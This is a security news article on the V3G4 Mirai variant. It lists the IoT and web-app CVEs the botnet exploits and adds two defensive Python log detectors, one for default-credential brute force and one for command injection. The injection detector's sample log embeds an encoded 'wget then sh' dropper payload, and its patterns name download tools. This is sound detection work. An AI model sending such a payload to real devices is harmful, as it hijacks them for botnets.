Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
By Waqas

The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection from July to December of 2022.
The IT security researchers at Palo Alto Networks’ Unit 42 have identified a new variant of the infamous Mirai malware, the botnet responsible for several large-scale Distributed Denial of Service (DDoS) attacks on Dyn DNS in October 2016.
Dubbed V3G4 by the researchers, it is a type of malware that specifically targets Internet of Things (IoT) devices. Like the original Mirai botnet, V3G4 infects IoT devices by exploiting default login credentials (factory-set usernames and passwords).
In the campaign tracked by Unit 42, one of the prime targets of the V3G4 malware has been exposed IP cameras. The malware uses the exposed servers and devices to create a powerful botnet, which can be used to launch DDoS attacks or perform other malicious activities, such as stealing data or installing additional malware.
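The default-credential infection path described above leaves a recognisable trace on the device or on a honeypot: a burst of failed logins from one source, cycling through several usernames, followed by a success. The script below is an added example (not code from HackRead or from the Unit 42 report) that parses a constructed, syslog-like telnet login log and flags such bursts; the log format, the thresholds and the sample addresses are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in an assumed syslog-like format from an IoT
# device's telnet daemon. 203.0.113.7 cycles through default usernames and
# eventually logs in; 192.0.2.50 is a single mistyped password, not an attack.
SAMPLE_LOG = """\
2022-09-14T02:11:03Z cam-01 telnetd: login failed user=admin from=203.0.113.7
2022-09-14T02:11:04Z cam-01 telnetd: login failed user=root from=203.0.113.7
2022-09-14T02:11:05Z cam-01 telnetd: login failed user=support from=203.0.113.7
2022-09-14T02:11:06Z cam-01 telnetd: login failed user=admin from=203.0.113.7
2022-09-14T02:11:07Z cam-01 telnetd: login failed user=user from=203.0.113.7
2022-09-14T02:11:09Z cam-01 telnetd: login ok user=admin from=203.0.113.7
2022-09-14T02:30:00Z cam-01 telnetd: login failed user=admin from=192.0.2.50
2022-09-14T02:40:00Z cam-01 telnetd: login ok user=admin from=192.0.2.50
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) telnetd: login (?P<result>failed|ok) "
    r"user=(?P<user>\S+) from=(?P<src>\S+)$"
)


def parse(log_text):
    """Turn matching log lines into dicts; lines in another format are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        event = m.groupdict()
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return events


def detect_credential_attacks(events, window=timedelta(minutes=5),
                              min_failures=4, min_users=3):
    """Return one finding per source IP that, inside `window`, produced at
    least `min_failures` failed logins spread over at least `min_users`
    distinct usernames (the dictionary-attack signature). If the same source
    then logs in successfully, record which account it got into."""
    by_src = defaultdict(list)
    for event in events:
        by_src[event["src"]].append(event)

    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "failed"]
        # Slide a window over the failures, anchored at each failure in turn.
        for i, first in enumerate(fails):
            in_win = [e for e in fails[i:] if e["ts"] - first["ts"] <= window]
            users = {e["user"] for e in in_win}
            if len(in_win) >= min_failures and len(users) >= min_users:
                last_fail_ts = in_win[-1]["ts"]
                success = next((e for e in evs
                                if e["result"] == "ok" and e["ts"] >= last_fail_ts),
                               None)
                findings[src] = {
                    "host": first["host"],
                    "failures": len(in_win),
                    "usernames": sorted(users),
                    "compromised_as": success["user"] if success else None,
                }
                break  # one finding per source is enough
    return findings


if __name__ == "__main__":
    for src, finding in detect_credential_attacks(parse(SAMPLE_LOG)).items():
        print(src, finding)
```

The threshold on distinct usernames is what separates a credential-dictionary attack from a user fumbling one password; tune `window` and `min_failures` to the login rate your devices actually see. A `compromised_as` value that is not `None` is the case worth paging on, since it means a default account was still enabled.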
According to Unit 42’s report, researchers observed the V3G4 malware leveraging several vulnerabilities to spread its infection from July to December of 2022. These vulnerabilities include the following:
- CVE-2019-15107: Webmin Command Injection Vulnerability
- CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
- CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
- CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
- CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
- CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
- CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
- CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
- CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
- Gitorious Remote Command Execution Vulnerability
- Mitel AWC Remote Command Execution Vulnerability
- Spree Commerce Arbitrary Command Execution Vulnerability
- FLIR Thermal Camera Remote Command Execution Vulnerability
Source: Unit 42
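Nearly every entry in the list above is a command injection or remote command execution bug in a web management interface, and IoT botnets exploit them the same way regardless of the specific device: a request parameter is abused to run a shell one-liner that fetches and executes a dropper. The script below is an added example (not code from HackRead or Unit 42) that scans constructed Common Log Format access-log lines for parameters that combine shell metacharacters with download-and-run verbs. The request path, the addresses and the dropper file name in the sample are placeholders, not real device endpoints or indicators from the report.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Common Log Format assumed). The second
# line carries a generic "fetch a script and run it" payload in the `ip`
# parameter; /cgi-bin/status.cgi is a placeholder path, not a real endpoint.
SAMPLE_ACCESS_LOG = """\
198.51.100.20 - - [03/Aug/2022:10:01:01 +0000] "GET /cgi-bin/status.cgi?ip=192.0.2.1 HTTP/1.1" 200 512
198.51.100.77 - - [03/Aug/2022:10:01:02 +0000] "GET /cgi-bin/status.cgi?ip=192.0.2.1%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F198.51.100.77%2Fbins.sh%3Bsh+bins.sh HTTP/1.1" 500 0
198.51.100.20 - - [03/Aug/2022:10:02:10 +0000] "POST /login HTTP/1.1" 302 0
"""

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Shell separators / substitution that should never appear in an IP, hostname
# or similar device parameter.
META = re.compile(r"[;|`]|\$\(|&&|\|\|")
# Verbs and locations typical of a botnet dropper stage.
DROPPER = re.compile(r"\b(wget|curl|tftp|busybox|chmod)\b|/tmp\b|\bsh\b")


def parse_clf(text):
    """Parse CLF lines into dicts; lines that do not match are skipped."""
    requests = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if m:
            requests.append(m.groupdict())
    return requests


def suspicious_params(target):
    """Return (name, decoded value) pairs whose URL-decoded value contains both
    a shell metacharacter and a dropper verb. parse_qsl does the percent- and
    plus-decoding, so encoded payloads are inspected in their decoded form."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if META.search(value) and DROPPER.search(value):
            hits.append((name, value))
    return hits


def detect_command_injection(text):
    """One finding per request that carries a suspicious parameter."""
    findings = []
    for req in parse_clf(text):
        hits = suspicious_params(req["target"])
        if hits:
            findings.append({
                "src": req["src"],
                "path": urlsplit(req["target"]).path,
                "status": req["status"],
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in detect_command_injection(SAMPLE_ACCESS_LOG):
        print(finding)
```

Requiring both a metacharacter and a dropper verb keeps false positives low on parameters that legitimately contain a `|` or `;`. The check is deliberately independent of any particular CVE: a patched device still logs the attempt, and a 200 or 500 status on such a request is the cue to look at the host. POST bodies are not in the access log, so this only covers the GET-style injections; body parameters need a proxy or WAF log.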
Researchers also noted that the botnet client carries a stop list of process names: it compares the list against the processes running on the infected host and terminates any match. The listed names belong to other botnet malware families and to previously identified Mirai variants.
V3G4’s stop list.
This should not come as a surprise, as there have been several Mirai variants that have surfaced over the years. Some of them included MooBot, Demonbot, OMG, and several others.
The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution.
Palo Alto Networks – Unit 42
To protect against V3G4 and other IoT malware, it is important to follow best practices for securing IoT devices. This includes changing default usernames and passwords, keeping software up to date with the latest security patches, and disabling unnecessary services and protocols. Network segmentation can also help to contain the spread of malware if a device is infected.
I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in the cyber security and tech world. I am also into gaming, reading and investigative journalism.